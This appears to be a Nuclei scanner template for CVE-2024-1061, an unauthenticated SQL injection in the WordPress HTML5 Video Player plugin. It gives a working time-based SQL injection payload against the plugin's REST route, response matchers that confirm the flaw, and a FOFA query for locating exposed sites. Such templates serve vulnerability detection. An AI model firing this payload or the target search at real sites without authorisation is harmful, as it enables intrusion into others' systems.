40 lines
1.6 KiB
YAML
40 lines
1.6 KiB
YAML
id: CVE-2024-1061
|
|
|
|
info:
|
|
name: WordPress HTML5 Video Player - SQL Injection
|
|
author: xxcdd
|
|
severity: high
|
|
description: |
|
|
WordPress HTML5 Video Player plugin is vulnerable to SQL injection. An unauthenticated attacker can exploit this vulnerability to perform SQL injection attacks.
|
|
reference:
|
|
- https://www.tenable.com/security/research/tra-2024-02
|
|
- https://wordpress.org/plugins/html5-video-player
|
|
- https://nvd.nist.gov/view/vuln/detail?vulnId=CVE-2024-1061
|
|
impact: |
|
|
Successful exploitation of this vulnerability could allow an attacker to perform SQL injection attacks, potentially leading to unauthorized access, data leakage, or further compromise of the WordPress site.
|
|
remediation: |
|
|
Vendor did not acknowledge vulnerability but the issue seems to have been fixed in version 2.5.25.
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
|
|
cvss-score: 8.6
|
|
cve-id: CVE-2024-1061
|
|
cwe-id: CWE-89
|
|
metadata:
|
|
verified: true
|
|
fofa-query: "\"wordpress\" && body=\"html5-video-player\""
|
|
max-request: 1
|
|
tags: cve,cve2024,wp,wordpress,wp-plugin,sqli,html5-video-player
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+-"
|
|
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- 'duration>=6'
|
|
- 'contains(header, "application/json")'
|
|
- 'contains_all(body, "created_at", "video_id")'
|
|
condition: and
|
|
# digest: 4b0a0048304602210082f5c18e0ac8422e532f5581f775dfd9a57d7c059cf6f41622d7a00306bfa3c6022100d0500ab738261efc3de306be7f8149c4a2f98b4c1560c26fe3617520ce9dd6e9:922c64590222798bb761d5b6d8e72950 |